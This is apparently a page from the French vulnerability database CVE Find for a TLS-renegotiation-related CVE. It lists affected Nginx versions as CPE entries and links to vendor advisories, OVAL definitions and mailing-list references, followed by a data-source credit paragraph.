- F5>>Nginx >> Version 0.3.34 (Open CPE detail)
- F5>>Nginx >> Version 0.3.35 (Open CPE detail)
- F5>>Nginx >> Version 0.3.36 (Open CPE detail)
- F5>>Nginx >> Version 0.3.37 (Open CPE detail)
- F5>>Nginx >> Version 0.3.38 (Open CPE detail)
- F5>>Nginx >> Version 0.3.39 (Open CPE detail)
- F5>>Nginx >> Version 0.3.40 (Open CPE detail)
- F5>>Nginx >> Version 0.3.41 (Open CPE detail)
- F5>>Nginx >> Version 0.3.42 (Open CPE detail)
- F5>>Nginx >> Version 0.3.43 (Open CPE detail)
- F5>>Nginx >> Version 0.3.44 (Open CPE detail)
- F5>>Nginx >> Version 0.3.45 (Open CPE detail)
- F5>>Nginx >> Version 0.3.46 (Open CPE detail)
- F5>>Nginx >> Version 0.3.47 (Open CPE detail)
- F5>>Nginx >> Version 0.3.48 (Open CPE detail)
- F5>>Nginx >> Version 0.3.49 (Open CPE detail)
- F5>>Nginx >> Version 0.3.50 (Open CPE detail)
- F5>>Nginx >> Version 0.3.51 (Open CPE detail)
- F5>>Nginx >> Version 0.3.52 (Open CPE detail)
- F5>>Nginx >> Version 0.3.53 (Open CPE detail)
- F5>>Nginx >> Version 0.3.54 (Open CPE detail)
- F5>>Nginx >> Version 0.3.55 (Open CPE detail)
- F5>>Nginx >> Version 0.3.56 (Open CPE detail)
- F5>>Nginx >> Version 0.3.57 (Open CPE detail)
- F5>>Nginx >> Version 0.3.58 (Open CPE detail)
- F5>>Nginx >> Version 0.3.59 (Open CPE detail)
- F5>>Nginx >> Version 0.3.60 (Open CPE detail)
- F5>>Nginx >> Version 0.3.61 (Open CPE detail)
- F5>>Nginx >> Version 0.4.0 (Open CPE detail)
- F5>>Nginx >> Version 0.4.1 (Open CPE detail)
- F5>>Nginx >> Version 0.4.2 (Open CPE detail)
- F5>>Nginx >> Version 0.4.3 (Open CPE detail)
- F5>>Nginx >> Version 0.4.4 (Open CPE detail)
- F5>>Nginx >> Version 0.4.5 (Open CPE detail)
- F5>>Nginx >> Version 0.4.6 (Open CPE detail)
- F5>>Nginx >> Version 0.4.7 (Open CPE detail)
- F5>>Nginx >> Version 0.4.8 (Open CPE detail)
- F5>>Nginx >> Version 0.4.9 (Open CPE detail)
- F5>>Nginx >> Version 0.4.10 (Open CPE detail)
- F5>>Nginx >> Version 0.4.11 (Open CPE detail)
- F5>>Nginx >> Version 0.4.12 (Open CPE detail)
- F5>>Nginx >> Version 0.4.13 (Open CPE detail)
- F5>>Nginx >> Version 0.4.14 (Open CPE detail)
- F5>>Nginx >> Version 0.5.0 (Open CPE detail)
- F5>>Nginx >> Version 0.5.1 (Open CPE detail)
- F5>>Nginx >> Version 0.5.2 (Open CPE detail)
- F5>>Nginx >> Version 0.5.3 (Open CPE detail)
- F5>>Nginx >> Version 0.5.4 (Open CPE detail)
- F5>>Nginx >> Version 0.5.5 (Open CPE detail)
- F5>>Nginx >> Version 0.5.6 (Open CPE detail)
- F5>>Nginx >> Version 0.5.7 (Open CPE detail)
- F5>>Nginx >> Version 0.5.8 (Open CPE detail)
- F5>>Nginx >> Version 0.5.9 (Open CPE detail)
- F5>>Nginx >> Version 0.5.10 (Open CPE detail)
- F5>>Nginx >> Version 0.5.11 (Open CPE detail)
- F5>>Nginx >> Version 0.5.12 (Open CPE detail)
- F5>>Nginx >> Version 0.5.13 (Open CPE detail)
- F5>>Nginx >> Version 0.5.14 (Open CPE detail)
- F5>>Nginx >> Version 0.5.15 (Open CPE detail)
- F5>>Nginx >> Version 0.5.16 (Open CPE detail)
- F5>>Nginx >> Version 0.5.17 (Open CPE detail)
- F5>>Nginx >> Version 0.5.18 (Open CPE detail)
- F5>>Nginx >> Version 0.5.19 (Open CPE detail)
- F5>>Nginx >> Version 0.5.20 (Open CPE detail)
- F5>>Nginx >> Version 0.5.21 (Open CPE detail)
- F5>>Nginx >> Version 0.5.22 (Open CPE detail)
- F5>>Nginx >> Version 0.5.23 (Open CPE detail)
- F5>>Nginx >> Version 0.5.24 (Open CPE detail)
- F5>>Nginx >> Version 0.5.25 (Open CPE detail)
- F5>>Nginx >> Version 0.5.26 (Open CPE detail)
- F5>>Nginx >> Version 0.5.27 (Open CPE detail)
- F5>>Nginx >> Version 0.5.28 (Open CPE detail)
- F5>>Nginx >> Version 0.5.29 (Open CPE detail)
- F5>>Nginx >> Version 0.5.30 (Open CPE detail)
- F5>>Nginx >> Version 0.5.31 (Open CPE detail)
- F5>>Nginx >> Version 0.5.32 (Open CPE detail)
- F5>>Nginx >> Version 0.5.33 (Open CPE detail)
- F5>>Nginx >> Version 0.5.34 (Open CPE detail)
- F5>>Nginx >> Version 0.5.35 (Open CPE detail)
- F5>>Nginx >> Version 0.5.36 (Open CPE detail)
- F5>>Nginx >> Version 0.5.37 (Open CPE detail)
- F5>>Nginx >> Version 0.5.38 (Open CPE detail)
- F5>>Nginx >> Version 0.6.0 (Open CPE detail)
- F5>>Nginx >> Version 0.6.1 (Open CPE detail)
- F5>>Nginx >> Version 0.6.2 (Open CPE detail)
- F5>>Nginx >> Version 0.6.3 (Open CPE detail)
- F5>>Nginx >> Version 0.6.4 (Open CPE detail)
- F5>>Nginx >> Version 0.6.5 (Open CPE detail)
- F5>>Nginx >> Version 0.6.6 (Open CPE detail)
- F5>>Nginx >> Version 0.6.7 (Open CPE detail)
- F5>>Nginx >> Version 0.6.8 (Open CPE detail)
- F5>>Nginx >> Version 0.6.9 (Open CPE detail)
- F5>>Nginx >> Version 0.6.10 (Open CPE detail)
- F5>>Nginx >> Version 0.6.11 (Open CPE detail)
- F5>>Nginx >> Version 0.6.12 (Open CPE detail)
- F5>>Nginx >> Version 0.6.13 (Open CPE detail)
- F5>>Nginx >> Version 0.6.14 (Open CPE detail)
- F5>>Nginx >> Version 0.6.15 (Open CPE detail)
- F5>>Nginx >> Version 0.6.16 (Open CPE detail)
- F5>>Nginx >> Version 0.6.17 (Open CPE detail)
- F5>>Nginx >> Version 0.6.18 (Open CPE detail)
- F5>>Nginx >> Version 0.6.19 (Open CPE detail)
- F5>>Nginx >> Version 0.6.20 (Open CPE detail)
- F5>>Nginx >> Version 0.6.21 (Open CPE detail)
- F5>>Nginx >> Version 0.6.22 (Open CPE detail)
- F5>>Nginx >> Version 0.6.23 (Open CPE detail)
- F5>>Nginx >> Version 0.6.24 (Open CPE detail)
- F5>>Nginx >> Version 0.6.25 (Open CPE detail)
- F5>>Nginx >> Version 0.6.26 (Open CPE detail)
- F5>>Nginx >> Version 0.6.27 (Open CPE detail)
- F5>>Nginx >> Version 0.6.28 (Open CPE detail)
- F5>>Nginx >> Version 0.6.29 (Open CPE detail)
- F5>>Nginx >> Version 0.6.30 (Open CPE detail)
- F5>>Nginx >> Version 0.6.31 (Open CPE detail)
- F5>>Nginx >> Version 0.6.32 (Open CPE detail)
- F5>>Nginx >> Version 0.6.33 (Open CPE detail)
- F5>>Nginx >> Version 0.6.34 (Open CPE detail)
- F5>>Nginx >> Version 0.6.35 (Open CPE detail)
- F5>>Nginx >> Version 0.6.36 (Open CPE detail)
- F5>>Nginx >> Version 0.6.37 (Open CPE detail)
- F5>>Nginx >> Version 0.6.38 (Open CPE detail)
- F5>>Nginx >> Version 0.6.39 (Open CPE detail)
- F5>>Nginx >> Version 0.7.0 (Open CPE detail)
- F5>>Nginx >> Version 0.7.1 (Open CPE detail)
- F5>>Nginx >> Version 0.7.2 (Open CPE detail)
- F5>>Nginx >> Version 0.7.3 (Open CPE detail)
- F5>>Nginx >> Version 0.7.4 (Open CPE detail)
- F5>>Nginx >> Version 0.7.5 (Open CPE detail)
- F5>>Nginx >> Version 0.7.6 (Open CPE detail)
- F5>>Nginx >> Version 0.7.7 (Open CPE detail)
- F5>>Nginx >> Version 0.7.8 (Open CPE detail)
- F5>>Nginx >> Version 0.7.9 (Open CPE detail)
- F5>>Nginx >> Version 0.7.10 (Open CPE detail)
- F5>>Nginx >> Version 0.7.11 (Open CPE detail)
- F5>>Nginx >> Version 0.7.12 (Open CPE detail)
- F5>>Nginx >> Version 0.7.13 (Open CPE detail)
- F5>>Nginx >> Version 0.7.14 (Open CPE detail)
- F5>>Nginx >> Version 0.7.15 (Open CPE detail)
- F5>>Nginx >> Version 0.7.16 (Open CPE detail)
- F5>>Nginx >> Version 0.7.17 (Open CPE detail)
- F5>>Nginx >> Version 0.7.18 (Open CPE detail)
- F5>>Nginx >> Version 0.7.19 (Open CPE detail)
- F5>>Nginx >> Version 0.7.20 (Open CPE detail)
- F5>>Nginx >> Version 0.7.21 (Open CPE detail)
- F5>>Nginx >> Version 0.7.22 (Open CPE detail)
- F5>>Nginx >> Version 0.7.23 (Open CPE detail)
- F5>>Nginx >> Version 0.7.24 (Open CPE detail)
- F5>>Nginx >> Version 0.7.25 (Open CPE detail)
- F5>>Nginx >> Version 0.7.26 (Open CPE detail)
- F5>>Nginx >> Version 0.7.27 (Open CPE detail)
- F5>>Nginx >> Version 0.7.28 (Open CPE detail)
- F5>>Nginx >> Version 0.7.29 (Open CPE detail)
- F5>>Nginx >> Version 0.7.30 (Open CPE detail)
- F5>>Nginx >> Version 0.7.31 (Open CPE detail)
- F5>>Nginx >> Version 0.7.32 (Open CPE detail)
- F5>>Nginx >> Version 0.7.33 (Open CPE detail)
- F5>>Nginx >> Version 0.7.34 (Open CPE detail)
- F5>>Nginx >> Version 0.7.35 (Open CPE detail)
- F5>>Nginx >> Version 0.7.36 (Open CPE detail)
- F5>>Nginx >> Version 0.7.37 (Open CPE detail)
- F5>>Nginx >> Version 0.7.38 (Open CPE detail)
- F5>>Nginx >> Version 0.7.39 (Open CPE detail)
- F5>>Nginx >> Version 0.7.40 (Open CPE detail)
- F5>>Nginx >> Version 0.7.41 (Open CPE detail)
- F5>>Nginx >> Version 0.7.42 (Open CPE detail)
- F5>>Nginx >> Version 0.7.43 (Open CPE detail)
- F5>>Nginx >> Version 0.7.44 (Open CPE detail)
- F5>>Nginx >> Version 0.7.45 (Open CPE detail)
- F5>>Nginx >> Version 0.7.46 (Open CPE detail)
- F5>>Nginx >> Version 0.7.47 (Open CPE detail)
- F5>>Nginx >> Version 0.7.48 (Open CPE detail)
- F5>>Nginx >> Version 0.7.49 (Open CPE detail)
- F5>>Nginx >> Version 0.7.50 (Open CPE detail)
- F5>>Nginx >> Version 0.7.51 (Open CPE detail)
- F5>>Nginx >> Version 0.7.52 (Open CPE detail)
- F5>>Nginx >> Version 0.7.53 (Open CPE detail)
- F5>>Nginx >> Version 0.7.54 (Open CPE detail)
- F5>>Nginx >> Version 0.7.55 (Open CPE detail)
- F5>>Nginx >> Version 0.7.56 (Open CPE detail)
- F5>>Nginx >> Version 0.7.57 (Open CPE detail)
- F5>>Nginx >> Version 0.7.58 (Open CPE detail)
- F5>>Nginx >> Version 0.7.59 (Open CPE detail)
- F5>>Nginx >> Version 0.7.60 (Open CPE detail)
- F5>>Nginx >> Version 0.7.61 (Open CPE detail)
- F5>>Nginx >> Version 0.7.62 (Open CPE detail)
- F5>>Nginx >> Version 0.7.63 (Open CPE detail)
- F5>>Nginx >> Version 0.7.64 (Open CPE detail)
- F5>>Nginx >> Version 0.7.65 (Open CPE detail)
- F5>>Nginx >> Version 0.7.66 (Open CPE detail)
- F5>>Nginx >> Version 0.7.67 (Open CPE detail)
- F5>>Nginx >> Version 0.7.68 (Open CPE detail)
- F5>>Nginx >> Version 0.7.69 (Open CPE detail)
- F5>>Nginx >> Version 0.8.0 (Open CPE detail)
- F5>>Nginx >> Version 0.8.1 (Open CPE detail)
- F5>>Nginx >> Version 0.8.2 (Open CPE detail)
- F5>>Nginx >> Version 0.8.3 (Open CPE detail)
- F5>>Nginx >> Version 0.8.4 (Open CPE detail)
- F5>>Nginx >> Version 0.8.5 (Open CPE detail)
- F5>>Nginx >> Version 0.8.6 (Open CPE detail)
- F5>>Nginx >> Version 0.8.7 (Open CPE detail)
- F5>>Nginx >> Version 0.8.8 (Open CPE detail)
- F5>>Nginx >> Version 0.8.9 (Open CPE detail)
- F5>>Nginx >> Version 0.8.10 (Open CPE detail)
- F5>>Nginx >> Version 0.8.11 (Open CPE detail)
- F5>>Nginx >> Version 0.8.12 (Open CPE detail)
- F5>>Nginx >> Version 0.8.13 (Open CPE detail)
- F5>>Nginx >> Version 0.8.14 (Open CPE detail)
- F5>>Nginx >> Version 0.8.15 (Open CPE detail)
- F5>>Nginx >> Version 0.8.16 (Open CPE detail)
- F5>>Nginx >> Version 0.8.17 (Open CPE detail)
- F5>>Nginx >> Version 0.8.18 (Open CPE detail)
- F5>>Nginx >> Version 0.8.19 (Open CPE detail)
- F5>>Nginx >> Version 0.8.20 (Open CPE detail)
- F5>>Nginx >> Version 0.8.21 (Open CPE detail)
- F5>>Nginx >> Version 0.8.22 (Open CPE detail)
Références
http://lists.apple.com/archives/security-announce/2010//May/msg00001.html
Tags : vendor-advisory, x_refsource_APPLE
Tags : vendor-advisory, x_refsource_APPLE
https://www.redhat.com/archives/fedora-package-announce/2009-December/msg00428.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
http://www.ietf.org/mail-archive/web/tls/current/msg03948.html
Tags : mailing-list, x_refsource_MLIST
Tags : mailing-list, x_refsource_MLIST
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01945686
Tags : vendor-advisory, x_refsource_HP
Tags : vendor-advisory, x_refsource_HP
http://lists.opensuse.org/opensuse-security-announce/2010-12/msg00005.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
http://www-01.ibm.com/support/docview.wss?uid=swg1PM12247
Tags : vendor-advisory, x_refsource_AIXAPAR
Tags : vendor-advisory, x_refsource_AIXAPAR
http://lists.opensuse.org/opensuse-security-announce/2011-07/msg00014.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
http://www.mandriva.com/security/advisories?name=MDVSA-2010:089
Tags : vendor-advisory, x_refsource_MANDRIVA
Tags : vendor-advisory, x_refsource_MANDRIVA
http://sunsolve.sun.com/search/document.do?assetkey=1-77-1021752.1-1
Tags : vendor-advisory, x_refsource_SUNALERT
Tags : vendor-advisory, x_refsource_SUNALERT
http://lists.fedoraproject.org/pipermail/package-announce/2010-May/040652.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
http://www-01.ibm.com/support/docview.wss?uid=swg1IC68055
Tags : vendor-advisory, x_refsource_AIXAPAR
Tags : vendor-advisory, x_refsource_AIXAPAR
http://lists.fedoraproject.org/pipermail/package-announce/2010-April/039561.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
http://lists.opensuse.org/opensuse-security-announce/2011-07/msg00013.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
https://www.redhat.com/archives/fedora-package-announce/2009-December/msg00442.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
http://www.cisco.com/en/US/products/products_security_advisory09186a0080b01d1d.shtml
Tags : vendor-advisory, x_refsource_CISCO
Tags : vendor-advisory, x_refsource_CISCO
http://www-01.ibm.com/support/docview.wss?uid=swg1IC67848
Tags : vendor-advisory, x_refsource_AIXAPAR
Tags : vendor-advisory, x_refsource_AIXAPAR
http://lists.fedoraproject.org/pipermail/package-announce/2010-October/049702.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11617
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
http://lists.apple.com/archives/security-announce/2010//May/msg00002.html
Tags : vendor-advisory, x_refsource_APPLE
Tags : vendor-advisory, x_refsource_APPLE
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01945686
Tags : vendor-advisory, x_refsource_HP
Tags : vendor-advisory, x_refsource_HP
http://lists.opensuse.org/opensuse-security-announce/2010-05/msg00001.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05150888
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
http://sunsolve.sun.com/search/document.do?assetkey=1-66-274990-1
Tags : vendor-advisory, x_refsource_SUNALERT
Tags : vendor-advisory, x_refsource_SUNALERT
http://lists.opensuse.org/opensuse-security-announce/2009-11/msg00009.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
https://www.redhat.com/archives/fedora-package-announce/2009-December/msg00449.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7478
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
http://lists.apple.com/archives/security-announce/2010/Jan/msg00000.html
Tags : vendor-advisory, x_refsource_APPLE
Tags : vendor-advisory, x_refsource_APPLE
http://www.securityfocus.com/archive/1/508130/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7315
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
http://lists.opensuse.org/opensuse-security-announce/2010-06/msg00001.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
http://www.securityfocus.com/archive/1/508075/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
http://xss.cx/examples/plesk-reports/plesk-parallels-controlpanel-psa.v.10.3.1_build1013110726.09%20os_redhat.el6-billing-system-plugin-javascript-injection-example-poc-report.html
Tags : x_refsource_MISC
Tags : x_refsource_MISC
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7973
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02512995
Tags : vendor-advisory, x_refsource_HP
Tags : vendor-advisory, x_refsource_HP
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10088
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11578
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
http://itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02273751
Tags : vendor-advisory, x_refsource_HP
Tags : vendor-advisory, x_refsource_HP
http://www.securityfocus.com/archive/1/515055/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
https://www.redhat.com/archives/fedora-package-announce/2009-December/msg01029.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
http://www.ietf.org/mail-archive/web/tls/current/msg03928.html
Tags : mailing-list, x_refsource_MLIST
Tags : mailing-list, x_refsource_MLIST
http://www-01.ibm.com/support/docview.wss?uid=swg1IC68054
Tags : vendor-advisory, x_refsource_AIXAPAR
Tags : vendor-advisory, x_refsource_AIXAPAR
http://sunsolve.sun.com/search/document.do?assetkey=1-66-273029-1
Tags : vendor-advisory, x_refsource_SUNALERT
Tags : vendor-advisory, x_refsource_SUNALERT
https://www.redhat.com/archives/fedora-package-announce/2009-December/msg00645.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
http://www.securityfocus.com/archive/1/507952/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
http://www-1.ibm.com/support/search.wss?rs=0&q=PM00675&apar=only
Tags : vendor-advisory, x_refsource_AIXAPAR
Tags : vendor-advisory, x_refsource_AIXAPAR
http://slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.597446
Tags : vendor-advisory, x_refsource_SLACKWARE
Tags : vendor-advisory, x_refsource_SLACKWARE
http://lists.opensuse.org/opensuse-security-announce/2010-04/msg00001.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
https://www.redhat.com/archives/fedora-package-announce/2009-December/msg01020.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
http://lists.opensuse.org/opensuse-security-announce/2010-05/msg00002.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
http://www.mandriva.com/security/advisories?name=MDVSA-2010:076
Tags : vendor-advisory, x_refsource_MANDRIVA
Tags : vendor-advisory, x_refsource_MANDRIVA
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-049
Tags : vendor-advisory, x_refsource_MS
Tags : vendor-advisory, x_refsource_MS
https://www.redhat.com/archives/fedora-package-announce/2009-December/msg00944.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8366
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS10-030/index.html
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02512995
Tags : vendor-advisory, x_refsource_HP
Tags : vendor-advisory, x_refsource_HP
http://www.educatedguesswork.org/2009/11/understanding_the_tls_renegoti.html
Tags : x_refsource_MISC
Tags : x_refsource_MISC
http://marc.info/?l=apache-httpd-announce&m=125755783724966&w=2
Tags : mailing-list, x_refsource_MLIST
Tags : mailing-list, x_refsource_MLIST
http://lists.opensuse.org/opensuse-security-announce/2010-12/msg00006.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8535
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
http://itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02273751
Tags : vendor-advisory, x_refsource_HP
Tags : vendor-advisory, x_refsource_HP
https://svn.resiprocate.org/rep/ietf-drafts/ekr/draft-rescorla-tls-renegotiate.txt
Tags : x_refsource_MISC
Tags : x_refsource_MISC
https://www.redhat.com/archives/fedora-package-announce/2009-December/msg00634.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
http://lists.opensuse.org/opensuse-security-announce/2010-10/msg00006.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
http://www.mandriva.com/security/advisories?name=MDVSA-2010:084
Tags : vendor-advisory, x_refsource_MANDRIVA
Tags : vendor-advisory, x_refsource_MANDRIVA
http://sunsolve.sun.com/search/document.do?assetkey=1-77-1021653.1-1
Tags : vendor-advisory, x_refsource_SUNALERT
Tags : vendor-advisory, x_refsource_SUNALERT
http://www.securityfocus.com/archive/1/516397/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
http://lists.fedoraproject.org/pipermail/package-announce/2010-October/049455.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
http://lists.fedoraproject.org/pipermail/package-announce/2010-April/039957.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
http://sunsolve.sun.com/search/document.do?assetkey=1-26-273350-1
Tags : vendor-advisory, x_refsource_SUNALERT
Tags : vendor-advisory, x_refsource_SUNALERT
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02436041
Tags : vendor-advisory, x_refsource_HP
Tags : vendor-advisory, x_refsource_HP
http://lists.fedoraproject.org/pipermail/package-announce/2010-October/049528.html
Tags : vendor-advisory, x_refsource_FEDORA
Tags : vendor-advisory, x_refsource_FEDORA
http://lists.gnu.org/archive/html/gnutls-devel/2009-11/msg00029.html
Tags : mailing-list, x_refsource_MLIST
Tags : mailing-list, x_refsource_MLIST
http://archives.neohapsis.com/archives/bugtraq/2013-11/0120.html
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
https://lists.apache.org/thread.html/ba661b0edd913b39ff129a32d855620dd861883ade05fd88a8ce517d%40%3Cdev.tomcat.apache.org%3E
Tags : mailing-list, x_refsource_MLIST
Tags : mailing-list, x_refsource_MLIST
https://lists.apache.org/thread.html/f8e0814e11c7f21f42224b6de111cb3f5e5ab5c15b78924c516d4ec2%40%3Cdev.tomcat.apache.org%3E
Tags : mailing-list, x_refsource_MLIST
Tags : mailing-list, x_refsource_MLIST
https://lists.apache.org/thread.html/rf8e8c091182b45daa50d3557cad9b10bb4198e3f08cf8f1c66a1b08d%40%3Cdev.tomcat.apache.org%3E
Tags : mailing-list, x_refsource_MLIST
Tags : mailing-list, x_refsource_MLIST
https://lists.apache.org/thread.html/re3b72cbb13e1dfe85c4a06959a3b6ca6d939b407ecca80db12b54220%40%3Cdev.tomcat.apache.org%3E
Tags : mailing-list, x_refsource_MLIST
Tags : mailing-list, x_refsource_MLIST
Les informations affichées sur CVE Find proviennent de plusieurs sources de référence rigoureusement sélectionnées. Les données CVE sont fournies par MITRE Corporation et la National Vulnerability Database (NVD). Le catalogue des vulnérabilités activement exploitées (KEV) provient de la Cybersecurity and Infrastructure Security Agency (CISA), tandis que les scores EPSS sont issus de FIRST.org. Enfin, les données relatives aux faiblesses logicielles (CWE) et aux schémas d'attaque courants (CAPEC)
sont maintenues par MITRE Corporation, et les informations sur les configurations
logicielles et matérielles (CPE) proviennent du NVD.